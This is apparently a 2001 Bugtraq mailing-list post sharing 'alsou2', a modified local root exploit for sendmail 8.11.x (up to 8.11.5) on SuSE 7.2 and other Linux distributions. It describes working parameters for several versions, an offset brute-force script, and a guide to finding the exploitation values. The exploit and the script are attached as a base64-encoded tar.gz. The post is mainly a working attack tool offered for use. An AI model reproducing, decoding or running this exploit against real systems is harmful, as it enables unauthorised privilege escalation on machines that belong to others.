Date: Sun, 26 Aug 2001 11:45:39 +0200
From: RoMaN SoFt / LLFB!! <roman@madrid.com>
To: grange@rt.mipt.ru
Subject: SuSE 7.2 (& others) sendmail local xploit
Cc: bugtraq@securityfocus.com
----=_3ahhotkohjdj422hr46c7hfgfi2858ejoa.MFSBCHJLHS
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable
Hi.
This is the 'alsou.c' sendmail 8.11.x (x<=3D5) xploit with some very
slight modifications:
- extensive documentation and example on how to get this to work on
several distros / sendmail versions=20
- working on default SuSE 7.2 (sendmail 8.11.3):
- also included working parameters for SuSE 6.4 with *custom
compiled* sendmail 8.11.2:
- allows to give offset in command line. Use with 'smxploit' script
(also included) in order to find correct offset. This will be
necessary in different distros / sendmail versions
- QUICK GUIDE for finding propper exploitation values (VECT, GOT and
OFFSET):
=3D=3D> CASE A: Non-stripped binary:
=3D=3D> CASE B: Stripped binary (this is the default on several =
distros):
Please read complete alsou2.c comment lines for the whole
explanation.
Regards,
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D
** RoMaN SoFt / LLFB ** =20
roman@madrid.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
----=_3ahhotkohjdj422hr46c7hfgfi2858ejoa.MFSBCHJLHS
Content-Type: application/octet-stream; name=alsou2.tar.gz
Content-Transfer-Encoding: base64
Content-Description: SuSE 7.2 (& others) sendmail local xploit
Content-Disposition: attachment; filename=alsou2.tar.gz
H4sIADhqiDsAA+0aaXPbxtVfxV/xStsVKZEgAJ6iLTWOY7tpE9u15MxkJEXBsSRhg1gGC0jkNOmf
7h/oe3uQ4CHZSR23M8EbiQSwb/fdxy4oWBJOvShuzmcxj7LWvd8BbLtj97td/Lbtfq8jv52O+tZw
z+63O67d6/TaeO203XbvHnR/D2Y2IReZlwLcS/nUS+7EY6n4HAx9XhAb9vdiwXPXCj4lDdux0bKd
W+zv2m67s7Q/Wh7xOz27cw/sT8nEbfAHt3/roAIHYKxO1/R/NokE4F82YbAvB61gH4yvwMByHGsO
ymXgJsomIPiUwTVLFyDiaDzJYMrDaBQFXhbxRAxxUVq3CWyesURE1wxCHuRTlmQSA7wkxDFvOosZ
4O2E30DGYcwy5IEY4XDD0/c0JBiS8WIII5GlXEALxJQoCyIEigrhRsmY0EM28vI4g9P89Bn0LRdq
62K060MjNYL0gi9Elr/3hv+CExgHATS51s+amnYgWzp6cHgP4NVoJFh27HZtWz14w4JoFqHEkHhT
JmCKrgc+AzHDgVHEQr3s4yBL42ZwomaJSdO17O79pQaJBkRJEOchC5eSzrwUF81QDTDiqZK2Z3WU
cQ4CJMWnEPDpLIpZeLBhStfYB+E8mHjJmEnT30flRQmDGD/EkKaTwaSt8sTcEWLA05SJGU9C4kWi
X64piU2jOOIfq9ICdkGnNK6V6iil0pPfoFW6VWpt3ze2J73G/EZ62pjck0tKqGgpNolMYlnwVjCl
1H0xVQGAgRGk0Uzi8jRkKa2BeguVWoJMr2UtI+smimPiMWEBE8LDoMGpGC4jlpIgBc82Zlr6t1n6
u2dPzxrw4tWZtMar589Pn50VnEDSeh0zD7lNmYeseCkb5XG8kPYacRKWbCWQP1zYUg5As/7x9uun
f4cXb7/+6pl0JSInPSzlsxkKx5TUKmyvvThngqYd/3rQBI+PT+DpE/TXJ0N4yZMmCh8hpRD8KEHd
GN90rCY8N6JLqUn6XBBv49CHmickbx6aKSSF6ryFNonGuFJs/FfULaSTkYt7GSx4jspJEk56J2vF
C6IWMj8fQysXaUsgH62lJXym1JblEXK4QI/FmSP0W/AgQe7lvRcEPE8yC75OVP4KyBBIah8NLyLM
cguYeOhlGZfZ5wEEs13EWtl0trxTiCRq86ftEcuyjC/XULDkvXLlVAYz2ZHsnkWzulani+okX952
Y+NiNEF5bjE9yLyOWZ7nacCkGXQuWreLcgwknOMDytoZm+E3+2RpwbANmAqgTR/YZZikcJYuyErS
LDSEIkkUZDVl5AM0isYrTNGZ5b9OLCvOhjJjII0htJ1+rw/fRTz2gujfVJTQg8bECJdTtNQPVBz/
3rkOvleOqD0QIxuzEKg5y/KaRUjBgu+ZaGgX5nkcEjV035RfsxA9DvwcwwbLUUbaRP9OBYtHMGzW
Na21+P5yCKfrsU2uuuo0TKneLvL1O5NAwT03SzLG6DpoPAxeNLVTk/h1zPjhMfpCTTZ5eJvmMy4K
T25Z/SODdsdM7r8L8+kMmuE6OpyIqZ6iUYbrCENMMiAWU5/HohCVoyhFV7hBc2LCvLyF6DjFGKxO
+bV18NA6aNTog/6depV6qJ/hBkMw3tKVhMHAkMo4B1x3oWMbl9sX0g/w2Y33AerNJ+BA80v8uIuP
GP3RhJNKawjNpuFnYB91R932ULPmOfgEHA+cPtiDFftIgL7s+cDpO97Abjxk3tys8YMC+Dj4wcA6
CwPDwmAATgB2b3OeZuGhH6OUTESSBZRzfRnfLNPZWkABpi25DK5glLGlnvMbtk9dNZX/qSyBsryh
S2B1o3olQ8zHZuD9jEfUxWWkGqVKGUkYx4Qyb81XOrss+JiHNXKCDQCGhoh87NM/aG1jYym9tZSe
rPypFek4nuu4xWU6YPdvWyaUy4S7lgmDUaewjH0XN8Fubs5JmwnuYFD5MsfyRPZdKWMr5am4edSs
X96evW6r9Qg1TAOyRxnLdkQlBBWSdXSKGk6tK2vDwdLMeu6XKydw1tzArC0np5icnKZjOfrpKe6T
M90IYlsx3UhMG9gf4u/u4XKR37rIDhM3CnGObTHuqTl2ebX6mrXXol6PLO/hschwD3A4cDu2fWKi
A8dtRAhYYCZ8CH7YzKPnuJU1QUIV/Xi15OUaez/lUWZ6O8xR2gWpcUjzJEFNWADP5pEpQn+B2gL7
fsDSvvhQBX6z4cc/q9ylO3wDRiUDpxu2uwN4c9Ue9K7+9vbb11en32C/C3qCxtshJzYqSjy5wC15
0+Dr7JGypt6zqx5Md91y/+kt+yXVNVK7sszXrumT1NgdHdJtnbSR+P+tlXb7br9tWmnxuVvpW1nq
/kaW3E/U3csDorV40l5BBCx4gq6ADUKKLmXbGTXoxlPo/w3/1nt5yp9n8Fi5R8i8bCJCzlML/U9S
Op3hxroBbs+yB5Zr2445kPo1IHmEV2ZDbnboZmMOhqnlqbQ+aURV53OYD3rm9EHjnXHABl3Fhh6R
G3oxkZuV9xRG2Q2HJJ/62McP17YNMlfSFpjKbHHTK5tpEzKrHfd2py8324VKm52NYm8sH++qsQO7
5x6t5qwV2B3VdZveCn+TRGNFgHK8ZkTleEUNd1KeEGxKvYca1qcGK6AHehnmwWOFdejaLqb8kOkW
NIyKaH4BrY1opjOi3sqejxQMsEny5cHDch4rzOvhvHeYiVXFoeHR0WrY6Z8UJo7swsTBiiAN+64z
6qw1+R9TiQyAF4ZyH8xH0kuKRLsFdopS7upGzZxBYQ5JuNHD75Z0CIFRxLruGpvzgtU8l0ryOzRr
QYHratpp6bW6r5RnCMgbWuGaBZmu91S6bP/IY3cV+3WNajWaMDMVtxhqggU8CfUZWLEkbzv/z4Wy
LBnFnobZ/eDOUrxiBgNe8/I65b7nx4tippjF3kKVVX2UmtEm9z1bZhU6Z18esD3licg8jDt1ytWA
mzTKMpbI0FNnJSHT+2M6eltPZ1LNPMF8H/7Vy5o9y7Xg+RaWvY5CG3uVvY4LpqBURqvRiZt+LnVi
rfIjvUKROT9bzJgpRjIFov4TffbzFCvK4VMjH33pg8PH6vuLNLOm0Syz0vxEIbQqULlvTv4ei4Vo
0frCmpwUH2dhHPn0rNI6WL2B+Ur3LVtvYmhZ885B20HWR/NMyl/oOs1zEn/VWq2ILV+A1NQLkPrm
ew8ZBwmdBS/xD3RXdUDNJZ0KX+dxwlKP8qbPAo/qDfqDmEQzUVzuyGrDzSQKJtvzpFytFmyIJruR
wuOldLYf+mxtyAhoexjtthRQuQaQa6gXcGuSdW4had9K0hu5u0kejbqdTmWp65evXr98+y2u5OLD
YOKh305YHJPHn1/CcWWvejFvOxfzwFbfoX8x9/Ha6eOz8AKzS1Xi0DOXmWcXc4Z4Tvdi3vVpnsKh
NQaDi3mnfTG3cf7gSI3bA7pWOHIswHtcp6PHJF2XaCgc2y/QwXHWu8D8av4JpyVTzaT6qFLJExGN
1SuEjKLniokZFtJ/Vvaurjwxvbqq0bFGTJl8JhN/tf6o8kulQuhogKQmD1fScdAAqZ4DvL4+v5Qr
qAdsPG6AOHe7vcsG4N5DXx141+dt+mbX5+7lo8reOifoUsdklQZQVsZr9QooZVlDdSwNiD36jBr6
2B6F2UNaiFpThOtTeskV1ASGO0tqS8PV4dDY9RC6KM5eNIKanHoML99+800dkPm9GUtTnqL4apU6
Cb63x3DbVWs6dP1LZU/MUuR2VJMyVp+9eHEssaZsigzJJQ+hQ93Kkd3QNGm8MI0QlvzgGg9FtbHy
sToJFY1qpGDcvWDN3dvTr+qOsc/iUU2q27mkVVksWEUWpgKSCoVH8nllT9Ot6nb8YXiRVI3+6hKp
spfKeUtXQOZW+jWMYxGoNkMpqzqLPYamtFMTastiPsI7suMhSHWRuRBP4uMtZg/MMTWkptQd4RiR
/rPsBkjVhhj6DCkmbz7MLfysbjqAtAsaOfAyYgzR5RNN7/DQUNSS0efJCQy0Bc+Ne9SRXQdjGvYv
7H0SFh3UpvvqdnnGyKFhiS7UtUvX5D1kCT0T7avunOLgnAXXrIb+3wD6Z9cqov7Xv434I8Dm73/M
9vZT0qDf/9z1+6+2s/r9T8ftI37X7rjl738+B9z/kyx9vicmlft0jvPBs4D74HaWZwAVfcrwwKmw
YMKhWjwueuBQG/3A3ToretCuVlS2OzenItDEO0S9hEcQ8squYxNzovEj9uTpct4hrvZjJeQJK/NF
CSWUUEIJJZRQQgkllFBCCSWUUEIJJZRQQgkllFBCCSWUUEIJJZRQQgkllFBCCX8Y+A9M9tjdAFAA
AA==
----=_3ahhotkohjdj422hr46c7hfgfi2858ejoa.MFSBCHJLHS--
